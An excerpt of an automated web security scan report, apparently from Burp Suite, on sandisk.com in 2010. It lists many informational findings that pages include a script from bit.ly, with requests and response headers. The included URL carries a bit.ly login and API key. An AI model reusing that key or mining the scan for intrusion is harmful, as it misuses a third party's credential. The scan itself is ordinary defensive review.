<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.79. http://www.sandisk.com/business-solutions/embedded-products previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/embedded-products

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/embedded-products HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37544
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.80. http://www.sandisk.com/business-solutions/embedded-products.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/embedded-products.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/embedded-products.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37549
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.81. http://www.sandisk.com/business-solutions/embedded-products/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/embedded-products/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/embedded-products/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37545
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.82. http://www.sandisk.com/business-solutions/embedded-products/inand previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/embedded-products/inand

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/embedded-products/inand HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/embedded-products
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37581
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.83. http://www.sandisk.com/business-solutions/find-a-distributor previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/find-a-distributor

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/find-a-distributor HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19642
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=ysssvz55hrpsoeep5niw5145; path=/; HttpOnly
Date: Tue, 16 Nov 2010 23:41:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.84. http://www.sandisk.com/business-solutions/flash-memory-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/flash-memory-cards

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/flash-memory-cards HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38736
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.85. http://www.sandisk.com/business-solutions/flash-memory-cards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/flash-memory-cards.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/flash-memory-cards.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38741
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.86. http://www.sandisk.com/business-solutions/flash-memory-cards/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/flash-memory-cards/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/flash-memory-cards/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38737
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.87. http://www.sandisk.com/business-solutions/flash-memory-cards/compact-flash-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/flash-memory-cards/compact-flash-cards

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/flash-memory-cards/compact-flash-cards HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/flash-memory-cards
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37476
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.88. http://www.sandisk.com/business-solutions/flash-memory-cards/memory-stick-pro-duo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/flash-memory-cards/memory-stick-pro-duo

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/flash-memory-cards/memory-stick-pro-duo HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/flash-memory-cards
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37227
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.89. http://www.sandisk.com/business-solutions/flash-memory-cards/sandisk-memory-stick-micro-(m2)-cards- previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/flash-memory-cards/sandisk-memory-stick-micro-(m2)-cards-

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/flash-memory-cards/sandisk-memory-stick-micro-(m2)-cards- HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/flash-memory-cards
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36650
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.90. http://www.sandisk.com/business-solutions/flash-memory-cards/sandisk-microsd-and-microsdhc-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/flash-memory-cards/sandisk-microsd-and-microsdhc-cards

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/flash-memory-cards/sandisk-microsd-and-microsdhc-cards HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/flash-memory-cards
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36558
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.91. http://www.sandisk.com/business-solutions/mobile-handset-vendors previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-handset-vendors

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/mobile-handset-vendors HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38644
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.92. http://www.sandisk.com/business-solutions/mobile-handset-vendors.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-handset-vendors.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/mobile-handset-vendors.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38649
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.93. http://www.sandisk.com/business-solutions/mobile-handset-vendors/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-handset-vendors/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/mobile-handset-vendors/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38645
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.94. http://www.sandisk.com/business-solutions/mobile-handset-vendors/inand previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-handset-vendors/inand

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/mobile-handset-vendors/inand HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-handset-vendors
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37695
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.95. http://www.sandisk.com/business-solutions/mobile-handset-vendors/m2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-handset-vendors/m2

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/mobile-handset-vendors/m2 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-handset-vendors
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37198
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.96. http://www.sandisk.com/business-solutions/mobile-handset-vendors/m2.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-handset-vendors/m2.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/mobile-handset-vendors/m2.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/flash-memory-cards
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37203
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.97. http://www.sandisk.com/business-solutions/mobile-handset-vendors/microsdhc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-handset-vendors/microsdhc

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/mobile-handset-vendors/microsdhc HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-handset-vendors
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37642
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

